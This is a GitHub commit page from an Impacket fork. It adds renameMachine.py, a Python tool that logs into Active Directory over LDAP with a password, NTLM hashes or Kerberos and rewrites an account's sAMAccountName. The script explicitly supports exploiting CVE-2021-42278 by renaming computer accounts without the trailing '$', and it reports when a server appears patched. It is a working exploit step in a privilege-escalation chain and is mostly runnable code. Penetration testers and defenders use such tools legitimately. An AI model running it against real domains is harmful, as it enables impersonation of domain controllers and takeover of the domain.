forked from fortra/impacket
-
Notifications
You must be signed in to change notification settings - Fork 21
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #69 from ShutdownRepo/CVE-2021-42278
fortra#1224 Added renameMachine.py
- Loading branch information
Showing
1 changed file
with
378 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,378 @@ | ||
#!/usr/bin/env python3 | ||
# Impacket - Collection of Python classes for working with network protocols. | ||
# | ||
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved. | ||
# | ||
# This software is provided under a slightly modified version | ||
# of the Apache Software License. See the accompanying LICENSE file | ||
# for more information. | ||
# | ||
# Description: | ||
# Python script for modifying the sAMAccountName of an account (can be used for CVE-2021-42278) | ||
# | ||
# Authors: | ||
# @snovvcrash | ||
# Charlie Bromberg (@_nwodtuhs) | ||
# | ||
|
||
import argparse | ||
import logging | ||
import sys | ||
import traceback | ||
import ldap3 | ||
import ssl | ||
import ldapdomaindump | ||
from binascii import unhexlify | ||
import os | ||
|
||
from impacket import version | ||
from impacket.examples import logger, utils | ||
from impacket.smbconnection import SMBConnection | ||
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech | ||
from ldap3.utils.conv import escape_filter_chars | ||
|
||
|
||
def get_machine_name(args, domain): | ||
if args.dc_ip is not None: | ||
s = SMBConnection(args.dc_ip, args.dc_ip) | ||
else: | ||
s = SMBConnection(domain, domain) | ||
try: | ||
s.login('', '') | ||
except Exception: | ||
if s.getServerName() == '': | ||
raise Exception('Error while anonymous logging into %s' % domain) | ||
else: | ||
s.logoff() | ||
return s.getServerName() | ||
|
||
|
||
def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, | ||
TGT=None, TGS=None, useCache=True): | ||
from pyasn1.codec.ber import encoder, decoder | ||
from pyasn1.type.univ import noValue | ||
""" | ||
logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported. | ||
:param string user: username | ||
:param string password: password for the user | ||
:param string domain: domain where the account is valid for (required) | ||
:param string lmhash: LMHASH used to authenticate using hashes (password is not used) | ||
:param string nthash: NTHASH used to authenticate using hashes (password is not used) | ||
:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication | ||
:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho) | ||
:param struct TGT: If there's a TGT available, send the structure here and it will be used | ||
:param struct TGS: same for TGS. See smb3.py for the format | ||
:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False | ||
:return: True, raises an Exception if error. | ||
""" | ||
|
||
if lmhash != '' or nthash != '': | ||
if len(lmhash) % 2: | ||
lmhash = '0' + lmhash | ||
if len(nthash) % 2: | ||
nthash = '0' + nthash | ||
try: # just in case they were converted already | ||
lmhash = unhexlify(lmhash) | ||
nthash = unhexlify(nthash) | ||
except TypeError: | ||
pass | ||
|
||
# Importing down here so pyasn1 is not required if kerberos is not used. | ||
from impacket.krb5.ccache import CCache | ||
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set | ||
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS | ||
from impacket.krb5 import constants | ||
from impacket.krb5.types import Principal, KerberosTime, Ticket | ||
import datetime | ||
|
||
if TGT is not None or TGS is not None: | ||
useCache = False | ||
|
||
if useCache: | ||
try: | ||
ccache = CCache.loadFile(os.getenv('KRB5CCNAME')) | ||
except Exception as e: | ||
# No cache present | ||
print(e) | ||
pass | ||
else: | ||
# retrieve domain information from CCache file if needed | ||
if domain == '': | ||
domain = ccache.principal.realm['data'].decode('utf-8') | ||
logging.debug('Domain retrieved from CCache: %s' % domain) | ||
|
||
logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME')) | ||
principal = 'ldap/%s@%s' % (target.upper(), domain.upper()) | ||
|
||
creds = ccache.getCredential(principal) | ||
if creds is None: | ||
# Let's try for the TGT and go from there | ||
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper()) | ||
creds = ccache.getCredential(principal) | ||
if creds is not None: | ||
TGT = creds.toTGT() | ||
logging.debug('Using TGT from cache') | ||
else: | ||
logging.debug('No valid credentials found in cache') | ||
else: | ||
TGS = creds.toTGS(principal) | ||
logging.debug('Using TGS from cache') | ||
|
||
# retrieve user information from CCache file if needed | ||
if user == '' and creds is not None: | ||
user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8') | ||
logging.debug('Username retrieved from CCache: %s' % user) | ||
elif user == '' and len(ccache.principal.components) > 0: | ||
user = ccache.principal.components[0]['data'].decode('utf-8') | ||
logging.debug('Username retrieved from CCache: %s' % user) | ||
|
||
# First of all, we need to get a TGT for the user | ||
userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) | ||
if TGT is None: | ||
if TGS is None: | ||
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, | ||
aesKey, kdcHost) | ||
else: | ||
tgt = TGT['KDC_REP'] | ||
cipher = TGT['cipher'] | ||
sessionKey = TGT['sessionKey'] | ||
|
||
if TGS is None: | ||
serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value) | ||
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, | ||
sessionKey) | ||
else: | ||
tgs = TGS['KDC_REP'] | ||
cipher = TGS['cipher'] | ||
sessionKey = TGS['sessionKey'] | ||
|
||
# Let's build a NegTokenInit with a Kerberos REQ_AP | ||
|
||
blob = SPNEGO_NegTokenInit() | ||
|
||
# Kerberos | ||
blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']] | ||
|
||
# Let's extract the ticket from the TGS | ||
tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0] | ||
ticket = Ticket() | ||
ticket.from_asn1(tgs['ticket']) | ||
|
||
# Now let's build the AP_REQ | ||
apReq = AP_REQ() | ||
apReq['pvno'] = 5 | ||
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value) | ||
|
||
opts = [] | ||
apReq['ap-options'] = constants.encodeFlags(opts) | ||
seq_set(apReq, 'ticket', ticket.to_asn1) | ||
|
||
authenticator = Authenticator() | ||
authenticator['authenticator-vno'] = 5 | ||
authenticator['crealm'] = domain | ||
seq_set(authenticator, 'cname', userName.components_to_asn1) | ||
now = datetime.datetime.utcnow() | ||
|
||
authenticator['cusec'] = now.microsecond | ||
authenticator['ctime'] = KerberosTime.to_asn1(now) | ||
|
||
encodedAuthenticator = encoder.encode(authenticator) | ||
|
||
# Key Usage 11 | ||
# AP-REQ Authenticator (includes application authenticator | ||
# subkey), encrypted with the application session key | ||
# (Section 5.5.1) | ||
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None) | ||
|
||
apReq['authenticator'] = noValue | ||
apReq['authenticator']['etype'] = cipher.enctype | ||
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator | ||
|
||
blob['MechToken'] = encoder.encode(apReq) | ||
|
||
request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO', | ||
blob.getData()) | ||
|
||
# Done with the Kerberos saga, now let's get into LDAP | ||
if connection.closed: # try to open connection if closed | ||
connection.open(read_server_info=False) | ||
|
||
connection.sasl_in_progress = True | ||
response = connection.post_send_single_response(connection.send('bindRequest', request, None)) | ||
connection.sasl_in_progress = False | ||
if response[0]['result'] != 0: | ||
raise Exception(response) | ||
|
||
connection.bound = True | ||
|
||
return True | ||
|
||
def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash): | ||
user = '%s\\%s' % (domain, username) | ||
connect_to = target | ||
if args.dc_ip is not None: | ||
connect_to = args.dc_ip | ||
if tls_version is not None: | ||
use_ssl = True | ||
port = 636 | ||
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version) | ||
else: | ||
use_ssl = False | ||
port = 389 | ||
tls = None | ||
ldap_server = ldap3.Server(connect_to, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls) | ||
if args.k: | ||
ldap_session = ldap3.Connection(ldap_server) | ||
ldap_session.bind() | ||
ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip) | ||
elif args.hashes is not None: | ||
ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True) | ||
else: | ||
ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True) | ||
|
||
return ldap_server, ldap_session | ||
|
||
|
||
def init_ldap_session(args, domain, username, password, lmhash, nthash): | ||
if args.k: | ||
target = get_machine_name(args, domain) | ||
else: | ||
if args.dc_ip is not None: | ||
target = args.dc_ip | ||
else: | ||
target = domain | ||
|
||
if args.use_ldaps is True: | ||
try: | ||
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash) | ||
except ldap3.core.exceptions.LDAPSocketOpenError: | ||
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash) | ||
else: | ||
return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash) | ||
|
||
|
||
def parse_identity(args): | ||
domain, username, password = utils.parse_credentials(args.identity) | ||
|
||
if domain == '': | ||
logging.critical('Domain should be specified!') | ||
sys.exit(1) | ||
|
||
if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None: | ||
from getpass import getpass | ||
logging.info("No credentials supplied, supply password") | ||
password = getpass("Password:") | ||
|
||
if args.aesKey is not None: | ||
args.k = True | ||
|
||
if args.hashes is not None: | ||
lmhash, nthash = args.hashes.split(':') | ||
else: | ||
lmhash = '' | ||
nthash = '' | ||
|
||
return domain, username, password, lmhash, nthash | ||
|
||
|
||
def init_logger(args): | ||
# Init the example's logger theme and debug level | ||
logger.init(args.ts) | ||
if args.debug is True: | ||
logging.getLogger().setLevel(logging.DEBUG) | ||
# Print the Library's installation path | ||
logging.debug(version.getInstallationPath()) | ||
else: | ||
logging.getLogger().setLevel(logging.INFO) | ||
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) | ||
|
||
|
||
def parse_args(): | ||
parser = argparse.ArgumentParser(add_help=True, description='Python script for modifying the sAMAccountName of an account (can be used for CVE-2021-42278)') | ||
parser.add_argument('identity', action='store', help='domain.local/username[:password]') | ||
parser.add_argument("-current-name", type=str, required=True, help="sAMAccountName of the object to edit") | ||
parser.add_argument("-new-name", type=str, required=True, help="New sAMAccountName to set for the target object") | ||
parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP') | ||
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') | ||
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') | ||
group = parser.add_argument_group('authentication') | ||
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') | ||
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') | ||
group.add_argument('-k', action="store_true", | ||
help='Use Kerberos authentication. Grabs credentials from ccache file ' | ||
'(KRB5CCNAME) based on target parameters. If valid credentials ' | ||
'cannot be found, it will use the ones specified in the command ' | ||
'line') | ||
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)') | ||
group = parser.add_argument_group('connection') | ||
group.add_argument('-dc-ip', action='store', metavar="ip address", | ||
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If ' | ||
'omitted it will use the domain part (FQDN) specified in ' | ||
'the identity parameter') | ||
|
||
if len(sys.argv) == 1: | ||
parser.print_help() | ||
sys.exit(1) | ||
|
||
return parser.parse_args() | ||
|
||
|
||
def get_user_info(samname, ldap_session, domain_dumper): | ||
ldap_session.search(domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid']) | ||
try: | ||
dn = ldap_session.entries[0].entry_dn | ||
return dn | ||
except IndexError: | ||
logging.error('Machine not found in LDAP: %s' % samname) | ||
return False | ||
|
||
|
||
def main(): | ||
print(version.BANNER) | ||
args = parse_args() | ||
init_logger(args) | ||
|
||
domain, username, password, lmhash, nthash = parse_identity(args) | ||
if len(nthash) > 0 and lmhash == "": | ||
lmhash = "aad3b435b51404eeaad3b435b51404ee" | ||
|
||
ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash) | ||
|
||
cnf = ldapdomaindump.domainDumpConfig() | ||
cnf.basepath = None | ||
domain_dumper = ldapdomaindump.domainDumper(ldap_server, ldap_session, cnf) | ||
operation = ldap3.MODIFY_REPLACE | ||
attribute = 'sAMAccountName' | ||
dn = get_user_info(args.current_name, ldap_session, domain_dumper) | ||
|
||
if not dn: | ||
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)') | ||
return | ||
try: | ||
logging.info('Modifying attribute (%s) of object (%s): (%s) -> (%s)' % (attribute, dn, args.current_name, args.new_name)) | ||
cve_attempt = False | ||
if "CN=Computers" in dn and attribute == 'sAMAccountName' and not args.new_name.endswith('$'): | ||
cve_attempt = True | ||
logging.info('New sAMAccountName does not end with \'$\' (attempting CVE-2021-42278)') | ||
ldap_session.modify(dn, {attribute: [operation, [args.new_name]]}) | ||
if ldap_session.result['result'] == 0: | ||
logging.info('Target object modified successfully!') | ||
else: | ||
error_code = int(ldap_session.result['message'].split(':')[0].strip(), 16) | ||
if error_code == 0x523 and cve_attempt: | ||
logging.debug('The server returned an error: %s', ldap_session.result['message']) | ||
# https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e | ||
logging.error('Server probably patched against CVE-2021-42278') | ||
elif ldap_session.result['result'] == 50: | ||
logging.error('Could not modify object, the server reports insufficient rights: %s', ldap_session.result['message']) | ||
elif ldap_session.result['result'] == 19: | ||
logging.error('Could not modify object, the server reports a constrained violation: %s', ldap_session.result['message']) | ||
else: | ||
logging.error('The server returned an error: %s', ldap_session.result['message']) | ||
except Exception as e: | ||
if logging.getLogger().level == logging.DEBUG: | ||
traceback.print_exc() | ||
logging.error(str(e)) | ||
|
||
if __name__ == '__main__': | ||
main() |